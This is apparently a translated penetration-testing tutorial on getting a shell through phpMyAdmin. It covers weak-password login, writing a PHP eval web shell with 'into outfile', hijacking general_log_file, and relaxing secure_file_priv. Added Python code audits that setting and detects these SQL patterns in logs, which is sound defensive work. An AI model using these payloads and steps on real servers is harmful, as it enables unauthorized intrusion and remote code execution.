This article, from the phpMyAdmin tutorial column, introduces getshell through the phpMyAdmin back end (penetration test). I hope it will be helpful to friends in need!
PhpMyAdmin Introduction
phpMyAdmin is a PHP-based, web-based MySQL database management tool that runs on the website host and lets administrators manage MySQL databases through a web interface. The web interface makes it simpler to enter complex SQL syntax, especially when importing and exporting large amounts of data.
After collecting and probing the target information, if the phpmyadmin directory is found to exist (try: http://ip:port/phpmyadmin/) and the management back end is entered through a weak password (you can directly try account root, password root) or brute-force cracking, there are many ways to getshell.
Exporting a Trojan with into outfile
If you want to plant a Trojan inside the website, the prerequisite is that you know the absolute path of the website. There are many methods, such as obtaining the path from error messages or through phpinfo.php (please refer to another blog post: https://blog.csdn.net/weixin_39190897/article/details/99078864).
The most convenient way is to use select @@basedir; to check directly (but sometimes this does not reveal it, and you have to find other methods):
From the output above, we can see that MySQL is located in the D:\soft\phpStudy\MySQL\ directory.
After obtaining the website path, you can attempt to upload the Trojan. The most commonly used method is to write a one-sentence Trojan directly into the root directory of the website through into outfile:
select '<?php eval($_POST[cmd]); ?>' into outfile 'D:\soft\phpStudy\www\xxx.php';
But in newer versions of MySQL, this statement does not run successfully.
The newer MySQL feature secure_file_priv affects reading and writing files. This parameter is used to limit import and export. We can use the show global variables like '%secure%'; command to view this parameter:
When secure_file_priv is NULL, MySQL does not allow import or export, so an error occurs. To make the statement export successfully, you need to modify the my.ini file in the MySQL folder and add secure_file_priv ="" to [mysqld]:
When secure_file_priv is set with no specific value, there is no restriction on mysqld import and export, and the export command can be executed at this time.
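From the defender's side, the same setting can be checked in the option file before the server starts. The following is an added example, not code from the original post: it classifies secure_file_priv in a my.ini. The function name, the sample option files and the web root D:/soft/phpStudy/www (taken from the path used above) are assumptions.

```python
import configparser
from pathlib import PureWindowsPath

def audit_secure_file_priv(ini_text, web_root):
    """Classify secure_file_priv in the [mysqld] section of an option file."""
    cp = configparser.ConfigParser(allow_no_value=True, strict=False,
                                   interpolation=None, delimiters=("=",))
    cp.read_string(ini_text)
    found, value = False, ""
    if cp.has_section("mysqld"):
        for key, raw in cp.items("mysqld"):
            # MySQL accepts both secure-file-priv and secure_file_priv
            if key.replace("-", "_") == "secure_file_priv":
                found, value = True, (raw or "").strip().strip("\"'")
    if not found:
        return "unset"            # build default applies; check the live value
    if value == "":
        return "unrestricted"     # exports may go anywhere mysqld can write
    if value.upper() == "NULL":
        return "disabled"         # import and export are refused
    target, root = PureWindowsPath(value), PureWindowsPath(web_root)
    if target == root or root in target.parents:
        return "inside-web-root"  # exports land where the web server runs scripts
    return "restricted"           # exports confined to a directory outside the web root

# Constructed sample option files (assumptions, not from the original post)
WEB_ROOT = "D:/soft/phpStudy/www"
SAMPLES = {
    "weak": '[mysqld]\nport = 3306\nsecure_file_priv = ""\n',
    "hardened": "[mysqld]\nport = 3306\nsecure_file_priv = NULL\n",
    "export-in-web-root": '[mysqld]\nsecure-file-priv = "D:/soft/phpStudy/www/export"\n',
    "export-dir": '[mysqld]\nsecure-file-priv = "D:/mysql-files"\n',
    "absent": "[mysqld]\nport = 3306\n",
}

if __name__ == "__main__":
    for name, ini in SAMPLES.items():
        print(f"{name:20} -> {audit_secure_file_priv(ini, WEB_ROOT)}")
```

Anything other than "disabled" or "restricted" deserves a follow-up against the running server with show global variables like '%secure%';.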
Using MySQL log files
MySQL version 5.0 and above will create log files, and you can also getshell by modifying the global variables of the log. But you must also have read and write permissions on the generated logs. (Note: my own test on Linux was unsuccessful due to permission issues.) First, let's introduce two MySQL global variables: general_log and general_log_file.
- general_log refers to the log saving status: ON means enabled, OFF means disabled;
- general_log_file refers to the log save path.
Command to view log status: show variables like '%general%';
In the above configuration, when general_log is turned on, the executed SQL statements will appear in the WIN-30DFNC8L78A.log file.
Then, if the value of general_log_file is modified, the executed SQL statements will be written to the new file instead, and this can then be used to getshell.
Correspondingly, the xxx.php file will be generated.
Write a one-sentence Trojan into the xxx.php file: SELECT '<?php eval ($_POST["cmd"]);?>'
Then you can see the Trojan statement recorded in the log file. Finally, connect with China Chopper to getshell:
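Both techniques above leave recognisable SQL statements behind. The following is an added example, not code from the original post: detection rules run over lines in the general query log layout. The rule names, the extension list and the sample lines are constructed for illustration; real entries may be spread over several log files or an audit log.

```python
import re

SCRIPT_EXT = r"\.(?:php\d?|phtml|jsp|aspx?)"   # web-executable extensions (assumed list)
RULES = {
    "outfile-to-script": r"\binto\s+(?:out|dump)file\s+'[^']*" + SCRIPT_EXT + r"'",
    "log-file-to-script": r"\bset\s+global\s+general_log_file\s*=\s*'[^']*" + SCRIPT_EXT + r"'",
    "general-log-enabled": r"\bset\s+global\s+general_log\s*=\s*'?(?:on|1)\b",
    "php-tag-in-literal": r"'[^']*<\?php",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}
# General query log layout: timestamp, thread id, command, argument
LINE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$")

def match_rules(statement):
    """Return the names of all rules that one SQL statement triggers."""
    return [name for name, rx in COMPILED.items() if rx.search(statement)]

def scan(log_text):
    """Return (thread_id, rule) pairs for every Query entry that trips a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m or m.group(3) != "Query":
            continue                      # skip Connect, Quit and malformed lines
        thread, stmt = int(m.group(2)), m.group(4)
        findings.extend((thread, rule) for rule in match_rules(stmt))
    return findings

# Constructed sample log lines (not captured from a real server)
SAMPLE_LOG = """\
2024-05-01T09:14:02.100000Z\t   41 Connect\troot@localhost on  using TCP/IP
2024-05-01T09:14:05.200000Z\t   41 Query\tshow variables like '%general%'
2024-05-01T09:14:09.300000Z\t   41 Query\tset global general_log = 'ON'
2024-05-01T09:14:15.400000Z\t   41 Query\tset global general_log_file = 'D:/soft/phpStudy/www/xxx.php'
2024-05-01T09:14:20.500000Z\t   41 Query\tSELECT '<?php eval ($_POST["cmd"]);?>'
2024-05-01T09:15:00.600000Z\t   42 Query\tSELECT id, name FROM app.users WHERE id = 7
"""

if __name__ == "__main__":
    for thread, rule in scan(SAMPLE_LOG):
        print(f"thread {thread}: {rule}")
```

A log file pointed at a script extension is worth alerting on by itself, since routine administration has no reason to do it.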